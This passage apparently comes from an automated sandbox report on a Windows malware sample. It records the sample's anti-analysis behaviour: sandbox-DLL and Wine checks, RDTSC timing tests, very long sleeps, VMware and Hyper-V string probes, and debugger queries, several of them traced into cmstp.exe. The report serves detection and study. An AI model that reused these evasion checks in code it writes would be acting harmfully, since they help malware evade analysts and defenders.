          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 20210113432.exe PID: 1476, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\20210113432.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000008498E4 second address: 00000000008498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000849B4E second address: 0000000000849B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\20210113432.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\20210113432.exe TID: 4360Thread sleep time: -52304s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exe TID: 1416Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6680Thread sleep count: 51 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6680Thread sleep time: -102000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5296Thread sleep time: -110000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000003.00000000.268046635.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000002.623832514.00000000069DE000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\20210113432.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491849B mov eax, dword ptr fs:[00000030h]10_2_0491849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909080 mov eax, dword ptr fs:[00000030h]10_2_04909080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983884 mov eax, dword ptr fs:[00000030h]10_2_04983884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983884 mov eax, dword ptr fs:[00000030h]10_2_04983884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov ecx, dword ptr fs:[00000030h]10_2_0493F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov eax, dword ptr fs:[00000030h]10_2_0493F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493F0BF mov eax, dword ptr fs:[00000030h]10_2_0493F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h]10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049490AF mov eax, dword ptr fs:[00000030h]10_2_049490AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h]10_2_0499B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8CD6 mov eax, dword ptr fs:[00000030h]10_2_049D8CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C14FB mov eax, dword ptr fs:[00000030h]10_2_049C14FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]10_2_04986CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]10_2_04986CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h]10_2_04986CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049058EC mov eax, dword ptr fs:[00000030h]10_2_049058EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D4015 mov eax, dword ptr fs:[00000030h]10_2_049D4015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D4015 mov eax, dword ptr fs:[00000030h]10_2_049D4015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]10_2_04987016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]10_2_04987016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987016 mov eax, dword ptr fs:[00000030h]10_2_04987016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]10_2_049D740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]10_2_049D740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D740D mov eax, dword ptr fs:[00000030h]10_2_049D740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h]10_2_04986C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h]10_2_049C1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]10_2_0491B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]10_2_0491B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]10_2_0491B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B02A mov eax, dword ptr fs:[00000030h]10_2_0491B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]10_2_0493002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]10_2_0493002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]10_2_0493002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]10_2_0493002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493002D mov eax, dword ptr fs:[00000030h]10_2_0493002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493BC2C mov eax, dword ptr fs:[00000030h]10_2_0493BC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04920050 mov eax, dword ptr fs:[00000030h]10_2_04920050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04920050 mov eax, dword ptr fs:[00000030h]10_2_04920050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499C450 mov eax, dword ptr fs:[00000030h]10_2_0499C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499C450 mov eax, dword ptr fs:[00000030h]10_2_0499C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A44B mov eax, dword ptr fs:[00000030h]10_2_0493A44B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D1074 mov eax, dword ptr fs:[00000030h]10_2_049D1074
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C2073 mov eax, dword ptr fs:[00000030h]10_2_049C2073
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492746D mov eax, dword ptr fs:[00000030h]10_2_0492746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932990 mov eax, dword ptr fs:[00000030h]10_2_04932990
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493FD9B mov eax, dword ptr fs:[00000030h]10_2_0493FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493FD9B mov eax, dword ptr fs:[00000030h]10_2_0493FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492C182 mov eax, dword ptr fs:[00000030h]10_2_0492C182
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]10_2_04932581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]10_2_04932581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]10_2_04932581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581 mov eax, dword ptr fs:[00000030h]10_2_04932581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A185 mov eax, dword ptr fs:[00000030h]10_2_0493A185
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]10_2_04902D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]10_2_04902D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]10_2_04902D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]10_2_04902D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04902D8A mov eax, dword ptr fs:[00000030h]10_2_04902D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04931DB5 mov eax, dword ptr fs:[00000030h]10_2_04931DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04931DB5 mov eax, dword ptr fs:[00000030h]10_2_04931DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04931DB5 mov eax, dword ptr fs:[00000030h]10_2_04931DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]10_2_049851BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]10_2_049851BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]10_2_049851BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049851BE mov eax, dword ptr fs:[00000030h]10_2_049851BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D05AC mov eax, dword ptr fs:[00000030h]10_2_049D05AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D05AC mov eax, dword ptr fs:[00000030h]10_2_049D05AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049335A1 mov eax, dword ptr fs:[00000030h]10_2_049335A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049361A0 mov eax, dword ptr fs:[00000030h]10_2_049361A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049361A0 mov eax, dword ptr fs:[00000030h]10_2_049361A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049869A6 mov eax, dword ptr fs:[00000030h]10_2_049869A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]10_2_04986DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]10_2_04986DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]10_2_04986DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov ecx, dword ptr fs:[00000030h]10_2_04986DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]10_2_04986DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04986DC9 mov eax, dword ptr fs:[00000030h]10_2_04986DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049B8DF1 mov eax, dword ptr fs:[00000030h]10_2_049B8DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B1E1 mov eax, dword ptr fs:[00000030h]10_2_0490B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B1E1 mov eax, dword ptr fs:[00000030h]10_2_0490B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B1E1 mov eax, dword ptr fs:[00000030h]10_2_0490B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049941E8 mov eax, dword ptr fs:[00000030h]10_2_049941E8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491D5E0 mov eax, dword ptr fs:[00000030h]10_2_0491D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491D5E0 mov eax, dword ptr fs:[00000030h]10_2_0491D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]10_2_049CFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]10_2_049CFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]10_2_049CFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CFDE2 mov eax, dword ptr fs:[00000030h]10_2_049CFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909100 mov eax, dword ptr fs:[00000030h]10_2_04909100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909100 mov eax, dword ptr fs:[00000030h]10_2_04909100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909100 mov eax, dword ptr fs:[00000030h]10_2_04909100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490AD30 mov eax, dword ptr fs:[00000030h]10_2_0490AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04913D34 mov eax, dword ptr fs:[00000030h]10_2_04913D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CE539 mov eax, dword ptr fs:[00000030h]10_2_049CE539
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934D3B mov eax, dword ptr fs:[00000030h]10_2_04934D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934D3B mov eax, dword ptr fs:[00000030h]10_2_04934D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934D3B mov eax, dword ptr fs:[00000030h]10_2_04934D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8D34 mov eax, dword ptr fs:[00000030h]10_2_049D8D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493513A mov eax, dword ptr fs:[00000030h]10_2_0493513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493513A mov eax, dword ptr fs:[00000030h]10_2_0493513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0498A537 mov eax, dword ptr fs:[00000030h]10_2_0498A537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]10_2_04924120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]10_2_04924120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]10_2_04924120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov eax, dword ptr fs:[00000030h]10_2_04924120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120 mov ecx, dword ptr fs:[00000030h]10_2_04924120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04927D50 mov eax, dword ptr fs:[00000030h]10_2_04927D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492B944 mov eax, dword ptr fs:[00000030h]10_2_0492B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492B944 mov eax, dword ptr fs:[00000030h]10_2_0492B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04943D43 mov eax, dword ptr fs:[00000030h]10_2_04943D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04983540 mov eax, dword ptr fs:[00000030h]10_2_04983540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B171 mov eax, dword ptr fs:[00000030h]10_2_0490B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490B171 mov eax, dword ptr fs:[00000030h]10_2_0490B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492C577 mov eax, dword ptr fs:[00000030h]10_2_0492C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492C577 mov eax, dword ptr fs:[00000030h]10_2_0492C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C962 mov eax, dword ptr fs:[00000030h]10_2_0490C962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493D294 mov eax, dword ptr fs:[00000030h]10_2_0493D294
